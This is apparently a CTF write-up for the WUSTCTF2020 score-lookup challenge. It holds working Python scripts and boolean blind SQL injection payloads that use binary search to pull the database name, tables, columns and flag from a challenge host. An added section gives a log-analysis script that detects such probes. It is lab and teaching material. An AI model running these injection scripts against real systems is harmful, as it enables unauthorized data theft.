[WUSTCTF2020]颜值成绩查询 (Looks Score Lookup)
Numeric (integer) injection, boolean-based blind.
Be quick about it: you must use binary search.
Dumping the database name gives: ctf
Core binary-search payload:
"if(ascii(substr((select/**/group_concat(table_name)from(information_schema.tables)where(table_schema=database())),%d,1))>%d,1,0)" % (i , mid)
import requests

url = "http://8a12a75e-26f1-4a40-ad74-95086cfef9df.node3.buuoj.cn/?stunum="
result = ""
i = 0
while True:
    i = i + 1            # position of the character being recovered
    head = 32            # search range: printable ASCII 32..126
    tail = 127
    while head < tail:   # binary search for the character's ASCII code
        mid = (head + tail) >> 1
        payload = "if(ascii(substr(database(),%d,1))>%d,1,0)" % (i, mid)
        r = requests.get(url + payload)
        r.encoding = "utf-8"
        #print(url+payload)
        if "your score is: 100" in r.text:   # condition true: code > mid
            head = mid + 1
        else:
            #print(r.text)
            tail = mid
    last = result
    if head != 32:       # head stays 32 once substr() returns '' (string exhausted)
        result += chr(head)
    else:
        break
print(result)

The output is shown in the screenshot below:
Dump the table names
Result: flag,score
import requests

url = "http://8a12a75e-26f1-4a40-ad74-95086cfef9df.node3.buuoj.cn/?stunum="
result = ""
i = 0
while True:
    i = i + 1            # position of the character being recovered
    head = 32            # search range: printable ASCII 32..126
    tail = 127
    while head < tail:   # binary search for the character's ASCII code
        mid = (head + tail) >> 1
        #payload = "if(ascii(substr(database(),%d,1))>%d,1,0)" % (i, mid)
        payload = "if(ascii(substr((select/**/group_concat(table_name)from(information_schema.tables)where(table_schema=database())),%d,1))>%d,1,0)" % (i, mid)
        r = requests.get(url + payload)
        r.encoding = "utf-8"
        #print(url+payload)
        if "your score is: 100" in r.text:   # condition true: code > mid
            head = mid + 1
        else:
            #print(r.text)
            tail = mid
    last = result
    if head != 32:       # head stays 32 once substr() returns '' (string exhausted)
        result += chr(head)
    else:
        break
print(result)

The output is shown in the screenshot below:
Dump the column names
Two columns are found: flag and value
import requests

url = "http://8a12a75e-26f1-4a40-ad74-95086cfef9df.node3.buuoj.cn/?stunum="
result = ""
i = 0
while True:
    i = i + 1            # position of the character being recovered
    head = 32            # search range: printable ASCII 32..126
    tail = 127
    while head < tail:   # binary search for the character's ASCII code
        mid = (head + tail) >> 1
        #payload = "if(ascii(substr(database(),%d,1))>%d,1,0)" % (i, mid)
        #payload = "if(ascii(substr((select/**/group_concat(table_name)from(information_schema.tables)where(table_schema=database())),%d,1))>%d,1,0)" % (i, mid)
        payload = "if(ascii(substr((select/**/group_concat(column_name)from(information_schema.columns)where(table_name='flag')),%d,1))>%d,1,0)" % (i, mid)
        r = requests.get(url + payload)
        r.encoding = "utf-8"
        #print(url+payload)
        if "your score is: 100" in r.text:   # condition true: code > mid
            head = mid + 1
        else:
            #print(r.text)
            tail = mid
    last = result
    if head != 32:       # head stays 32 once substr() returns '' (string exhausted)
        result += chr(head)
    else:
        break
print(result)

Dump the data
The flag table has two columns, flag and value.
Dump the flag column
The result of dumping it is shown below; it did not give the flag, so we guess the flag is in the value column.
Dump the value column, and the flag is indeed there. If it were not, you would have to dump the other columns.
And once more: binary search. You must use binary search. Otherwise, on some challenges the contest may be over before your dump finishes.
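From the defender's side, the scripts above leave a very recognisable trail: every request is one `if(ascii(substr(...))>N,1,0)` comparison on the `stunum` parameter, and the `information_schema` reads mark the schema-enumeration phase. The following script is an added example, not part of the original writeup; it assumes a simplified access-log format (client, request line, status) and uses constructed log lines, counting such probes per client, tracking the highest character position reached and noting `information_schema` reads:

```python
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlparse

# Constructed sample log lines (not taken from the challenge): a stripped-down
# combined-log record per line, "client \"METHOD target PROTO\" status".
SAMPLE_LOG = """\
10.0.0.5 "GET /?stunum=1 HTTP/1.1" 200
10.0.0.9 "GET /?stunum=if(ascii(substr(database(),1,1))>79,1,0) HTTP/1.1" 200
10.0.0.9 "GET /?stunum=if(ascii(substr(database(),1,1))>103,1,0) HTTP/1.1" 200
10.0.0.9 "GET /?stunum=if(ascii(substr(database(),1,1))>115,1,0) HTTP/1.1" 200
10.0.0.9 "GET /?stunum=if(ascii(substr(database(),1,1))>97,1,0) HTTP/1.1" 200
10.0.0.9 "GET /?stunum=if(ascii(substr(database(),2,1))>79,1,0) HTTP/1.1" 200
10.0.0.9 "GET /?stunum=if(ascii(substr((select/**/group_concat(table_name)from(information_schema.tables)where(table_schema=database())),1,1))>79,1,0) HTTP/1.1" 200
10.0.0.7 "GET /?stunum=2 HTTP/1.1" 200
"""

# Shape of the boolean oracle used on this page: a conditional around
# ascii(substr(...)) compared against a number, i.e. one step of a binary search.
ORACLE_RE = re.compile(r"if\s*\(\s*ascii\s*\(\s*substr\s*\(", re.IGNORECASE)
# Trailing ",<pos>,1))><threshold>" of such a probe; group 1 is the position.
POS_RE = re.compile(r",\s*(\d+)\s*,\s*1\s*\)\s*\)\s*>\s*(\d+)")
LINE_RE = re.compile(r'^(\S+) "(\S+) (\S+) \S+" (\d+)$')

def analyze(log_text):
    """Per-client stats: requests, oracle probes, highest position probed,
    and whether information_schema was queried."""
    stats = defaultdict(lambda: {"requests": 0, "probes": 0, "max_pos": 0, "schema": False})
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue                      # skip lines not in the assumed format
        client, _method, target, _status = m.groups()
        s = stats[client]
        s["requests"] += 1
        # parse_qs splits each pair on the first "=", so "table_schema=database()"
        # inside the value does not break the parse.
        for value in parse_qs(urlparse(target).query).get("stunum", []):
            if not ORACLE_RE.search(value):
                continue
            s["probes"] += 1
            pm = POS_RE.search(value)
            if pm:
                s["max_pos"] = max(s["max_pos"], int(pm.group(1)))
            if "information_schema" in value.lower():
                s["schema"] = True
    return dict(stats)

def suspicious_clients(stats, min_probes=3):
    """Clients that issued at least min_probes oracle probes (one is never enough)."""
    return sorted(c for c, s in stats.items() if s["probes"] >= min_probes)
```

A legitimate user never sends such a parameter, so even a low threshold like three probes from one client is a reliable alert; the rising `max_pos` shows how far the extraction has progressed.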